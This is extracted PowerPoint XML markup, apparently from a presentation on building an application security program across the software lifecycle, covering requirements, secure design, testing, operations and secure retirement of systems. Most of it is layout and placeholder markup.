    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="1232520"/>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sp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="1278353"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4339580" y="268223"/>
          <a:ext cx="946532"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policies and standards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common set of reusable security controls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a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="120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application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="120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kern="120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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>development roles and topics.  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="95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2033070" y="2620939"/>
        <a:ext cx="5513346" cy="854120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2462361"/>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sp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="2508194"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4324133" y="1498065"/>
          <a:ext cx="97742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secure implementation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verification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threat modeling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design &amp;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coding &amp;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code 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penetration testing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remediation.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="120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support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> to be successful.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="95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2033070" y="3836842"/>
        <a:ext cx="5511838" cy="881998"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="3692202"/>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sp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="3738035"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4334773" y="2727906"/>
          <a:ext cx="95614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 activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033071" y="5076284"/>
        <a:ext cx="5512877" cy="862796"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="4922043"/>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Provide Management Visibility</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="4967876"/>
        <a:ext cx="847227" cy="10796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627227" y="-2187463"/>
          <a:ext cx="808128" cy="5490643"/>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08000" rIns="9144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receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets.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 functional security requirements.</a:t>
          </a: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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1285970" y="193244"/>
        <a:ext cx="5451193" cy="729228"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="157586" y="2267"/>
          <a:ext cx="1128382" cy="111118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sp:txBody>
      <dsp:txXfrm>
        <a:off x="211829" y="56510"/>
        <a:ext cx="1019896" cy="1002696"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3542371" y="-1015166"/>
          <a:ext cx="977840" cy="5490643"/>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08000" rIns="9144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with internal or external developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.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rough planning and design phase.</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Adopt templates and checklists, such as </a:t>
          </a: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a:t>
          </a:r>
          <a:b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br>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="1"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NB: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"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Please note that the Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</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285970" y="1288969"/>
        <a:ext cx="5442909" cy="882372"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="157586" y="1174564"/>
          <a:ext cx="1128382" cy="111118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sp:txBody>
      <dsp:txXfrm>
        <a:off x="211829" y="1228807"/>
        <a:ext cx="1019896" cy="1002696"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3532460" y="157129"/>
          <a:ext cx="997660" cy="5490643"/>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800" tIns="108000" rIns="72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dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>To ensure applications have a secure design, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>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Define a security architecture, controls, and countermeasures according to the protection needs and the planned environmental security level. This should be supported by security specialists.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Get the application owner to assume remaining risks or to provide additional resources.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Each sprint, ensure security stories are created for functional requirements, and constraints added for non-functional requirements.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285969" y="2452322"/>
        <a:ext cx="5441941" cy="900256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="157586" y="2346860"/>
          <a:ext cx="1128382" cy="111118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Design</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211829" y="2401103"/>
        <a:ext cx="1019896" cy="1002696"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3390525" y="1448774"/>
          <a:ext cx="1273966" cy="5485281"/>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000" tIns="108000" rIns="90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dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>To </a:t>
          </a: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ensure secure operations and changes, the following should be performed:</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Automate the secure setup of the application, interfaces and of all components needed, including required authorizations.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level of security required by the application.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CMDB and security architecture.</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284868" y="3616621"/>
        <a:ext cx="5423091" cy="1149586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="157586" y="3519157"/>
          <a:ext cx="1127281" cy="134451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p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="212615" y="3574186"/>
        <a:ext cx="1017223" cy="1234459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3518223" y="2735057"/>
          <a:ext cx="1026135" cy="5490643"/>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08000" rIns="93600" bIns="123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>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To ensure secure operations and changes, the following should be performed:</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Operating including the security management for the application (e.g. patch management).</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CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.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285969" y="5017403"/>
        <a:ext cx="5440551" cy="925951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="157586" y="4924788"/>
          <a:ext cx="1128382" cy="111118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Operating and Changes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211829" y="4979031"/>
        <a:ext cx="1019896" cy="1002696"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3697352" y="3769187"/>
          <a:ext cx="667877" cy="5490643"/>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08000" rIns="93600" bIns="123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>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The process of retiring systems is often overlooked. You should ensure that:</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Any required data is archived. All other data is securely wiped.</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Securely close down the application, including deleting unused accounts and roles and permissions.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285970" y="6213173"/>
        <a:ext cx="5458040" cy="602671"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="157586" y="6097085"/>
          <a:ext cx="1128382" cy="83484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sp:txBody>
      <dsp:txXfrm>
        <a:off x="198340" y="6137839"/>
        <a:ext cx="1046874" cy="75333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170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Datumsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143375" y="1"/>
            <a:ext cx="3170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>30.10.2017</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9120190"/>
            <a:ext cx="3170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143375" y="9120190"/>
            <a:ext cx="3170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{91832A97-7139-43D2-8F8B-094A116E151F}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>‹Nr.›</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169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143590" y="3"/>
            <a:ext cx="3169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/30/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2308225" y="720725"/>
            <a:ext cx="2698750" cy="3598863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582"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115165" tIns="57582" rIns="115165" bIns="5758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6"/>
            <a:ext cx="3169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143590" y="9119476"/>
            <a:ext cx="3169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nr.›</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25</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‹Nr.›</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solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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3200" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2804001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‹Nr.›</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4A1647"/>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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chemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="none"/>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="54000" tIns="45720" rIns="54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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193308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4A1647"/>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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t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2741469646"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a: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chemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="none"/>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="54000" tIns="45720" rIns="54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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Gruppieren 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="24248" y="1058047"/>
            <a:ext cx="6071752" cy="390006"/>
            <a:chOff x="24248" y="1058047"/>
            <a:chExt cx="6071752" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="24248" y="1058047"/>
              <a:ext cx="6071752" cy="386519"/>
              <a:chOff x="24248" y="1070390"/>
              <a:chExt cx="6071752"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3649102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‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2194897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‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
